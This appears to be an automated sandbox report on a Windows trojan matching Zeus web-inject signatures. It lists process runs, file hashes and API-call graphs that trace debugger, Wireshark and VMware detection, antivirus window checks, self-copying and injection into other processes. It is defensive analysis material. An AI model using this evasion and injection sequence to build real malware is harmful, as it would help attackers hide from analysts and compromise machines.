                                                                                                                                                                                                              Imagebase:0xe10000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000025.00000002.2089692841.0000000002650000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000025.00000002.2089952227.00000000027F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:38
                                                                                                                                                                                                              Start time:12:47:40
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6920 -ip 6920
                                                                                                                                                                                                              Imagebase:0x740000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:39
                                                                                                                                                                                                              Start time:12:47:40
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
                                                                                                                                                                                                              Imagebase:0xe10000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000027.00000002.2089124359.0000000000E40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000027.00000002.2089771985.0000000002940000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:40
                                                                                                                                                                                                              Start time:12:47:40
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 6896 -ip 6896
                                                                                                                                                                                                              Imagebase:0x740000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                Execution Coverage:2%
                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                Signature Coverage:69.3%
                                                                                                                                                                                                                Total number of Nodes:280
                                                                                                                                                                                                                Total number of Limit Nodes:11
                                                                                                                                                                                                                execution_graph 20933 402b70 21003 401000 IsDebuggerPresent 20933->21003 20935 402b81 LoadLibraryA GetModuleFileNameA 21023 403920 GetModuleFileNameA strstr 20935->21023 20938 402bb1 21039 4021b0 CreateFileA 20938->21039 20939 402ba9 ExitProcess 20944 402be6 21050 402340 CreateFileA 20944->21050 20945 402bce GetTickCount PostMessageA 20945->20944 20954 402c06 21165 4033b0 70 API calls 20954->21165 20955 402c17 IsUserAnAdmin GetModuleHandleA 20956 402c50 20955->20956 20957 402c31 GetProcAddress 20955->20957 20960 402ca2 20956->20960 20961 402c56 20956->20961 20957->20956 20959 402c43 GetCurrentProcess 20957->20959 20959->20956 20964 402d59 20960->20964 20965 402caa StrStrIA 20960->20965 20966 402c70 20961->20966 20967 402c5a StrStrIA 20961->20967 20962 402c0b 20962->20955 20963 402c0f ExitProcess 20962->20963 20972 401130 13 API calls 20964->20972 20968 402cc0 20965->20968 20969 402cfd 20965->20969 21076 401130 memset memset 20966->21076 20967->20966 20970 402c93 20967->20970 20973 401130 13 API calls 20968->20973 20974 4028b0 98 API calls 20969->20974 21119 4028b0 VirtualQuery GetModuleFileNameA 20970->21119 20976 402d64 GlobalFindAtomA 20972->20976 20978 402ccb GlobalFindAtomA 20973->20978 20979 402d02 GlobalFindAtomA 20974->20979 20981 402db4 ExitProcess 20976->20981 20982 402d74 GlobalAddAtomA IsUserAnAdmin 20976->20982 20978->20981 20985 402cdf GlobalAddAtomA IsUserAnAdmin 20978->20985 20986 402d52 20979->20986 20987 402d12 GlobalAddAtomA IsUserAnAdmin 20979->20987 20989 402d95 IsUserAnAdmin 20982->20989 20990 402cf4 20982->20990 20985->20989 20985->20990 20992 401520 9 API calls 20986->20992 20993 402d33 IsUserAnAdmin 20987->20993 20994 402d23 20987->20994 20991 402da0 20989->20991 20990->20989 20996 401aa0 7 API calls 20991->20996 20997 402c9d 20992->20997 20995 402d3e 20993->20995 20994->20993 21166 401aa0 memset CreateToolhelp32Snapshot 20995->21166 20999 402dab 20996->20999 20997->20981 20999->20981 21001 401b70 32 API calls 20999->21001 21000 402d49 21000->20986 21002 401b70 32 API calls 21000->21002 21001->20981 21002->20986 21004 401022 FindWindowA 21003->21004 21005 40111b 21003->21005 21004->21005 21006 401038 memset CreateToolhelp32Snapshot 21004->21006 21005->20935 21007 401063 Process32First 21006->21007 21008 4010d1 21006->21008 21010 401083 StrStrIA 21007->21010 21009 401aa0 7 API calls 21008->21009 21022 40110e 21008->21022 21011 4010df 21009->21011 21012 4010a3 21010->21012 21013 401097 Process32Next 21010->21013 21014 401aa0 7 API calls 21011->21014 21011->21022 21012->21008 21015 4010b3 GetHandleInformation 21012->21015 21013->21010 21013->21012 21016 4010ed 21014->21016 21015->21008 21017 4010c3 21015->21017 21019 401aa0 7 API calls 21016->21019 21016->21022 21017->21008 21018 4010ca FindCloseChangeNotification 21017->21018 21018->21008 21020 4010fb 21019->21020 21021 4010ff PathFileExistsA 21020->21021 21020->21022 21021->21022 21022->20935 21024 403974 21023->21024 21025 402ba5 21023->21025 21176 403870 RegOpenKeyExA 21024->21176 21025->20938 21025->20939 21028 403981 GetUserNameA CharUpperA strstr 21028->21025 21029 4039b8 strstr 21028->21029 21029->21025 21030 4039d1 strstr 21029->21030 21030->21025 21031 4039ea strstr 21030->21031 21031->21025 21032 403a03 strstr 21031->21032 21032->21025 21033 403a1c GetSystemWindowsDirectoryA GetVolumeInformationA 21032->21033 21033->21025 21034 403a5c 21033->21034 21034->21025 21035 403a78 GetModuleFileNameA StrStrIA 21034->21035 21035->21025 21036 403aa0 StrStrIA 21035->21036 21036->21025 21037 403ab2 StrStrIA 21036->21037 21037->21025 21038 403ac4 21037->21038 21038->21025 21040 402330 21039->21040 21041 402300 DeviceIoControl CloseHandle 21039->21041 21042 4020c0 memset SHGetFolderPathA 21040->21042 21041->21040 21043 402187 21042->21043 21044 40211e PathAppendA SetCurrentDirectoryA 21042->21044 21046 402192 FindWindowA 21043->21046 21047 40218b FreeLibrary 21043->21047 21044->21043 21045 402141 LoadLibraryA 21044->21045 21045->21043 21048 402155 GetProcAddress 21045->21048 21046->20944 21046->20945 21047->21046 21048->21043 21049 402165 21048->21049 21049->21043 21051 4023e3 WriteFile GetSystemTimeAsFileTime WriteFile CloseHandle 21050->21051 21052 402424 21050->21052 21051->21052 21053 402430 SHGetFolderPathA 21052->21053 21054 402515 21053->21054 21055 402457 21053->21055 21057 402520 SHGetFolderPathA 21054->21057 21055->21055 21056 4024cc MoveFileA 21055->21056 21056->21054 21058 40264f 21057->21058 21059 40254b CreateFileA 21057->21059 21062 402660 CoInitializeEx 21058->21062 21059->21058 21061 4025b1 11 API calls 21059->21061 21061->21058 21063 40268e 21062->21063 21064 40269f GetModuleFileNameW SysAllocString 21062->21064 21063->21064 21066 4028a4 IsUserAnAdmin 21063->21066 21065 4026cd SysAllocString 21064->21065 21070 402846 21064->21070 21067 402833 SysFreeString 21065->21067 21068 4026de CoCreateInstance 21065->21068 21066->20954 21066->20955 21069 402843 SysFreeString 21067->21069 21067->21070 21072 402705 21068->21072 21073 402807 21068->21073 21069->21070 21070->21066 21071 40289e CoUninitialize 21070->21071 21071->21066 21072->21067 21072->21073 21074 402793 CoCreateInstance 21072->21074 21073->21067 21075 4027b5 21074->21075 21075->21073 21077 40118a IsUserAnAdmin 21076->21077 21078 4012ce GetCurrentProcessId 21076->21078 21079 401280 RegOpenKeyExA 21077->21079 21080 401198 RegCreateKeyExA 21077->21080 21087 401b70 21078->21087 21081 4012b6 21079->21081 21082 40129e RegSetValueExA 21079->21082 21080->21081 21083 4011be GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA _snprintf 21080->21083 21081->21078 21084 4012bd RegFlushKey RegCloseKey 21081->21084 21082->21081 21085 401221 21083->21085 21084->21078 21086 40125e RegSetValueExA 21085->21086 21086->21081 21088 401dd8 Sleep 21087->21088 21090 401b86 21087->21090 21088->20981 21091 401ba5 21090->21091 21092 401b9b Sleep 21090->21092 21181 401fb0 11 API calls 21090->21181 21182 401fb0 11 API calls 21091->21182 21092->21090 21092->21091 21094 401bac 21095 401dd3 21094->21095 21096 401bb4 OpenProcess 21094->21096 21095->21088 21096->21095 21097 401bcf GetModuleHandleA 21096->21097 21098 401c06 21097->21098 21099 401beb GetProcAddress 21097->21099 21100 401c0c GetModuleHandleA 21098->21100 21101 401c3f VirtualAllocEx 21098->21101 21099->21098 21102 401bf9 GetCurrentProcess 21099->21102 21103 401c22 GetProcAddress 21100->21103 21104 401c2e 21100->21104 21105 401db0 GetHandleInformation 21101->21105 21106 401c82 WriteProcessMemory 21101->21106 21102->21098 21103->21104 21104->21101 21104->21105 21105->21095 21107 401dc6 21105->21107 21108 401cae 21106->21108 21109 401d1f WriteProcessMemory FlushInstructionCache CreateRemoteThread 21106->21109 21107->21095 21110 401dcc CloseHandle 21107->21110 21111 401cb1 VirtualAlloc 21108->21111 21118 401d19 21108->21118 21112 401d62 GetHandleInformation 21109->21112 21113 401d8e RtlCreateUserThread 21109->21113 21110->21095 21111->21108 21114 401cc9 memcpy WriteProcessMemory VirtualFree 21111->21114 21115 401d85 21112->21115 21116 401d78 21112->21116 21113->21105 21114->21108 21115->21105 21116->21115 21117 401d7e CloseHandle 21116->21117 21117->21115 21118->21109 21120 402910 21119->21120 21120->21120 21121 40291f PathFileExistsA 21120->21121 21122 402932 GetSystemWindowsDirectoryA 21121->21122 21123 402a39 _snprintf CopyFileA 21121->21123 21124 402947 21122->21124 21125 402b66 21123->21125 21126 402a76 21123->21126 21124->21124 21127 40294f GetModuleHandleA 21124->21127 21160 401520 VirtualQuery GetModuleFileNameA PathFileExistsA 21125->21160 21128 401130 13 API calls 21126->21128 21129 4029a7 21127->21129 21130 402987 GetProcAddress 21127->21130 21131 402a7f 21128->21131 21133 4029d6 GetTickCount 21129->21133 21157 4029ad 21129->21157 21130->21129 21132 402999 GetCurrentProcess 21130->21132 21183 401de0 21131->21183 21132->21129 21245 401600 GetTickCount GetModuleHandleA GetProcAddress 21133->21245 21138 4029e2 21246 401920 GetTickCount GetModuleHandleA GetProcAddress 21138->21246 21141 402a99 RtlImageNtHeader 21144 402aa4 21141->21144 21145 402abd GetProcessHeap HeapValidate 21141->21145 21142 402add 21223 401ea0 CreateFileA 21142->21223 21212 4012e0 21144->21212 21145->21142 21147 402ad2 GetProcessHeap HeapFree 21145->21147 21147->21142 21149 402abb 21149->21145 21150 402b2f 21153 402b3f GlobalFindAtomA 21150->21153 21234 4019b0 memset memset lstrcpynA CreateProcessA 21150->21234 21151 402b0f GetProcAddress 21151->21150 21152 402b21 GetCurrentProcess 21151->21152 21152->21150 21155 402b5b GlobalAddAtomA 21153->21155 21156 402b4f 21153->21156 21155->21125 21158 401520 9 API calls 21156->21158 21157->21123 21159 402b54 ExitProcess 21158->21159 21161 4015ef 21160->21161 21162 40157c GetTempPathA GetTempFileNameA MoveFileExA 21160->21162 21161->20997 21162->21161 21163 4015c3 SetFileAttributesA DeleteFileA 21162->21163 21163->21161 21164 4015e3 MoveFileExA 21163->21164 21164->21161 21165->20962 21167 401ae7 Process32First 21166->21167 21168 401adc 21166->21168 21169 401b07 StrStrIA 21167->21169 21168->21000 21170 401b16 Process32Next 21169->21170 21171 401b22 21169->21171 21170->21169 21170->21171 21172 401b50 21171->21172 21173 401b32 GetHandleInformation 21171->21173 21172->21000 21173->21172 21174 401b42 21173->21174 21174->21172 21175 401b49 FindCloseChangeNotification 21174->21175 21175->21172 21177 4038a6 RegQueryValueExA 21176->21177 21180 4038d5 21176->21180 21178 4038db RegCloseKey 21177->21178 21179 4038cb RegCloseKey 21177->21179 21178->21180 21179->21180 21180->21025 21180->21028 21181->21090 21182->21094 21184 401e97 21183->21184 21185 401dfb 21183->21185 21196 4013c0 21184->21196 21186 4013c0 16 API calls 21185->21186 21187 401e04 21186->21187 21187->21184 21188 401e0e RtlImageNtHeader 21187->21188 21189 401e75 GetProcessHeap HeapValidate 21188->21189 21190 401e1b GetTickCount GetModuleHandleA 21188->21190 21189->21184 21193 401e8b GetProcessHeap HeapFree 21189->21193 21191 401e55 21190->21191 21192 401e3e GetProcAddress 21190->21192 21195 4012e0 8 API calls 21191->21195 21192->21191 21194 401e4e 21192->21194 21193->21184 21194->21191 21195->21189 21197 4013d6 CreateFileA 21196->21197 21198 4014eb 21196->21198 21197->21198 21200 4013f8 GetFileSizeEx 21197->21200 21199 4014f2 IsBadWritePtr 21198->21199 21201 401501 21198->21201 21199->21201 21202 401417 GetProcessHeap RtlAllocateHeap 21200->21202 21209 4014ba 21200->21209 21201->21141 21201->21142 21204 401445 21202->21204 21205 401436 memset 21202->21205 21203 4014cf GetHandleInformation 21203->21198 21206 4014de 21203->21206 21207 40144c SetFilePointer LockFile ReadFile UnlockFile 21204->21207 21204->21209 21205->21204 21206->21198 21208 4014e4 FindCloseChangeNotification 21206->21208 21207->21209 21210 401498 GetProcessHeap HeapValidate 21207->21210 21208->21198 21209->21198 21209->21203 21210->21209 21211 4014ae GetProcessHeap HeapFree 21210->21211 21211->21209 21213 4013ad 21212->21213 21214 4012f4 21212->21214 21213->21149 21214->21213 21215 401305 CreateFileA 21214->21215 21216 4013a3 21215->21216 21217 401324 SetFilePointer LockFile WriteFile UnlockFile 21215->21217 21216->21149 21218 401379 21217->21218 21219 401369 SetEndOfFile 21217->21219 21218->21216 21220 401387 GetHandleInformation 21218->21220 21219->21218 21220->21216 21221 401396 21220->21221 21221->21216 21222 40139c FindCloseChangeNotification 21221->21222 21222->21216 21224 401ed2 GetFileTime 21223->21224 21225 401f65 MoveFileExA GetModuleHandleA 21223->21225 21226 401ef0 GetHandleInformation 21224->21226 21227 401f0c CreateFileA 21224->21227 21225->21150 21225->21151 21226->21227 21228 401eff 21226->21228 21227->21225 21229 401f2b SetFileTime 21227->21229 21228->21227 21230 401f05 CloseHandle 21228->21230 21229->21225 21231 401f49 GetHandleInformation 21229->21231 21230->21227 21231->21225 21232 401f58 21231->21232 21232->21225 21233 401f5e CloseHandle 21232->21233 21233->21225 21235 401a33 21234->21235 21236 401a8f 21234->21236 21237 401a45 GetHandleInformation 21235->21237 21238 401a5d 21235->21238 21236->21153 21237->21238 21241 401a50 21237->21241 21239 401a81 21238->21239 21240 401a69 GetHandleInformation 21238->21240 21239->21153 21240->21239 21243 401a74 21240->21243 21241->21238 21242 401a56 CloseHandle 21241->21242 21242->21238 21243->21239 21244 401a7a CloseHandle 21243->21244 21244->21239 21245->21138 21246->21157 21249 406a70 GetPEB 21250 406b60 GetPEB GetPEB 21251 401f70 VirtualQuery 21248 4034e9 58 API calls 21247 40217a FreeLibrary

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 0 402b70-402ba7 call 401000 LoadLibraryA GetModuleFileNameA call 403920 5 402bb1-402bcc call 4021b0 call 4020c0 FindWindowA 0->5 6 402ba9-402bab ExitProcess 0->6 11 402be6-402c04 call 402340 call 402430 call 402520 call 402660 IsUserAnAdmin 5->11 12 402bce-402be0 GetTickCount PostMessageA 5->12 21 402c06-402c0d call 4033b0 11->21 22 402c17-402c2f IsUserAnAdmin GetModuleHandleA 11->22 12->11 21->22 30 402c0f-402c11 ExitProcess 21->30 23 402c50-402c54 22->23 24 402c31-402c41 GetProcAddress 22->24 27 402ca2-402ca4 23->27 28 402c56-402c58 23->28 24->23 26 402c43-402c4d GetCurrentProcess 24->26 26->23 31 402d59-402d72 call 401130 GlobalFindAtomA 27->31 32 402caa-402cbe StrStrIA 27->32 33 402c70-402c8e call 401130 GetCurrentProcessId call 401b70 Sleep 28->33 34 402c5a-402c6e StrStrIA 28->34 48 402db4-402db6 ExitProcess 31->48 49 402d74-402d83 GlobalAddAtomA IsUserAnAdmin 31->49 35 402cc0-402cd9 call 401130 GlobalFindAtomA 32->35 36 402cfd-402d10 call 4028b0 GlobalFindAtomA 32->36 33->48 34->33 37 402c93-402c98 call 4028b0 call 401520 34->37 35->48 52 402cdf-402cee GlobalAddAtomA IsUserAnAdmin 35->52 53 402d52-402d57 call 401520 36->53 54 402d12-402d21 GlobalAddAtomA IsUserAnAdmin 36->54 58 402c9d 37->58 56 402d95-402d9e IsUserAnAdmin 49->56 57 402d85-402d88 49->57 52->56 62 402cf4-402cf8 52->62 53->48 63 402d33-402d3c IsUserAnAdmin 54->63 64 402d23-402d2b 54->64 59 402da0 56->59 60 402da5-402dad call 401aa0 56->60 65 402d89-402d8d 57->65 58->48 59->60 60->48 73 402daf call 401b70 60->73 62->65 66 402d43-402d4b call 401aa0 63->66 67 402d3e 63->67 64->63 65->56 66->53 74 402d4d call 401b70 66->74 67->66 73->48 74->53
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00401000: IsDebuggerPresent.KERNEL32 ref: 00401014
                                                                                                                                                                                                                  • Part of subcall function 00401000: FindWindowA.USER32(OLLYDBG,00000000), ref: 0040102A
                                                                                                                                                                                                                  • Part of subcall function 00401000: memset.MSVCRT ref: 0040104B
                                                                                                                                                                                                                  • Part of subcall function 00401000: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401056
                                                                                                                                                                                                                  • Part of subcall function 00401000: Process32First.KERNEL32 ref: 00401071
                                                                                                                                                                                                                  • Part of subcall function 00401000: StrStrIA.KERNELBASE(?,wireshark.exe), ref: 0040108D
                                                                                                                                                                                                                  • Part of subcall function 00401000: Process32Next.KERNEL32(00000000,?), ref: 0040109D
                                                                                                                                                                                                                  • Part of subcall function 00401000: GetHandleInformation.KERNEL32(00000000,00000000), ref: 004010B9
                                                                                                                                                                                                                  • Part of subcall function 00401000: FindCloseChangeNotification.KERNELBASE(00000000), ref: 004010CB
                                                                                                                                                                                                                  • Part of subcall function 00401000: PathFileExistsA.KERNELBASE(\\?\globalroot\systemroot\system32\vmx_fb.dll,vmwaretray.exe,idag.exe,dumpcap.exe), ref: 00401104
                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(user32.dll), ref: 00402B86
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402B9A
                                                                                                                                                                                                                  • Part of subcall function 00403920: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403953
                                                                                                                                                                                                                  • Part of subcall function 00403920: strstr.MSVCRT ref: 00403967
                                                                                                                                                                                                                  • Part of subcall function 00403920: GetUserNameA.ADVAPI32(?,00000104), ref: 0040398C
                                                                                                                                                                                                                  • Part of subcall function 00403920: CharUpperA.USER32(?), ref: 00403999
                                                                                                                                                                                                                  • Part of subcall function 00403920: strstr.MSVCRT ref: 004039AB
                                                                                                                                                                                                                  • Part of subcall function 00403920: strstr.MSVCRT ref: 004039C4
                                                                                                                                                                                                                  • Part of subcall function 00403920: strstr.MSVCRT ref: 004039DD
                                                                                                                                                                                                                  • Part of subcall function 00403920: strstr.MSVCRT ref: 004039F6
                                                                                                                                                                                                                  • Part of subcall function 00403920: strstr.MSVCRT ref: 00403A0F
                                                                                                                                                                                                                  • Part of subcall function 00403920: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A28
                                                                                                                                                                                                                  • Part of subcall function 00403920: GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4C
                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00402BAB
                                                                                                                                                                                                                • FindWindowA.USER32(____AVP.Root,00000000), ref: 00402BC2
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402BCE
                                                                                                                                                                                                                • PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402BE0
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 00402C00
                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00402C11
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: strstr$FileFindName$ExitInformationModuleProcessProcess32UserWindow$AdminChangeCharCloseCountCreateDebuggerDirectoryExistsFirstHandleLibraryLoadMessageNextNotificationPathPostPresentSnapshotSystemTickToolhelp32UpperVolumeWindowsmemset
                                                                                                                                                                                                                • String ID: IsWow64Process$Pnv$Tue Aug 2 12:53:17 20112$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
                                                                                                                                                                                                                • API String ID: 9317432-1956477594
                                                                                                                                                                                                                • Opcode ID: 284e66e4bbf4f984f0241835b871c3ec669658df2c17cadb1783e4bd5444081f
                                                                                                                                                                                                                • Instruction ID: 39ff8b4b23ffe36b6a173c4f6bdc5339f36d51dfac64fa60dc4ffdda49012cd9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 284e66e4bbf4f984f0241835b871c3ec669658df2c17cadb1783e4bd5444081f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8751A1B1600215ABEB107BF1EE0EB9E36686F84745F50013AFB01B61E1DBFC9C418A6D

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(00401F70,?,0000001C,7604DB30,00000000,00000000), ref: 004028EB
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00402903
                                                                                                                                                                                                                • PathFileExistsA.KERNELBASE(?), ref: 00402924
                                                                                                                                                                                                                • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040293C
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0040297D
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040298D
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 0040299E
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 004029D6
                                                                                                                                                                                                                  • Part of subcall function 00401600: GetTickCount.KERNEL32 ref: 0040160B
                                                                                                                                                                                                                  • Part of subcall function 00401600: GetModuleHandleA.KERNEL32(ntdll.dll,?,004029E2,00000000), ref: 0040161C
                                                                                                                                                                                                                  • Part of subcall function 00401600: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 0040162C
                                                                                                                                                                                                                  • Part of subcall function 00401920: GetTickCount.KERNEL32 ref: 0040194A
                                                                                                                                                                                                                  • Part of subcall function 00401920: GetModuleHandleA.KERNEL32(ntdll.dll,?,004029EE,-00000006,00000000), ref: 00401957
                                                                                                                                                                                                                  • Part of subcall function 00401920: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401963
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 00402A50
                                                                                                                                                                                                                • CopyFileA.KERNEL32(?,?,00000001), ref: 00402A68
                                                                                                                                                                                                                • RtlImageNtHeader.NTDLL(00000000), ref: 00402A9A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402AC5
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00402AC8
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402AD4
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00402AD7
                                                                                                                                                                                                                • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402AF6
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402B05
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402B15
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 00402B26
                                                                                                                                                                                                                • GlobalFindAtomA.KERNEL32(Tue Aug 2 12:53:17 20111), ref: 00402B44
                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00402B55
                                                                                                                                                                                                                • GlobalAddAtomA.KERNEL32(Tue Aug 2 12:53:17 20111), ref: 00402B60
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryExistsExitFindFreeHeaderImageMoveNamePathQuerySystemValidateVirtualWindows_snprintf
                                                                                                                                                                                                                • String ID: %s_$.exe$IsWow64Process$Tue Aug 2 12:53:17 20111$\apppatch\$kernel32.dll$svchost.exe
                                                                                                                                                                                                                • API String ID: 4049655197-1703505012
                                                                                                                                                                                                                • Opcode ID: 8c19fc42e0cf0d5ec2b52a9f48d22261c74e53a708defb603739ef645998fcf7
                                                                                                                                                                                                                • Instruction ID: 7f5ae7708a7b69610b0b59458e4d7764c7ebe7900fbd9078b2849b4018493b30
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c19fc42e0cf0d5ec2b52a9f48d22261c74e53a708defb603739ef645998fcf7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A715EB16043419FC710EF60DE889AB7BE8BB98300F44493EF785B72A1D7789904CB99

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 128 403920-40396e GetModuleFileNameA strstr 129 403974-40397b call 403870 128->129 130 403ac6-403ace 128->130 129->130 133 403981-4039b2 GetUserNameA CharUpperA strstr 129->133 133->130 134 4039b8-4039cb strstr 133->134 134->130 135 4039d1-4039e4 strstr 134->135 135->130 136 4039ea-4039fd strstr 135->136 136->130 137 403a03-403a16 strstr 136->137 137->130 138 403a1c-403a5a GetSystemWindowsDirectoryA GetVolumeInformationA 137->138 138->130 139 403a5c-403a61 138->139 139->130 140 403a63-403a68 139->140 140->130 141 403a6a-403a6f 140->141 141->130 142 403a71-403a76 141->142 142->130 143 403a78-403a9e GetModuleFileNameA StrStrIA 142->143 143->130 144 403aa0-403ab0 StrStrIA 143->144 144->130 145 403ab2-403ac2 StrStrIA 144->145 145->130 146 403ac4 145->146 146->130
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403953
                                                                                                                                                                                                                • strstr.MSVCRT ref: 00403967
                                                                                                                                                                                                                  • Part of subcall function 00403870: RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,y9@), ref: 0040389C
                                                                                                                                                                                                                  • Part of subcall function 00403870: RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 004038C1
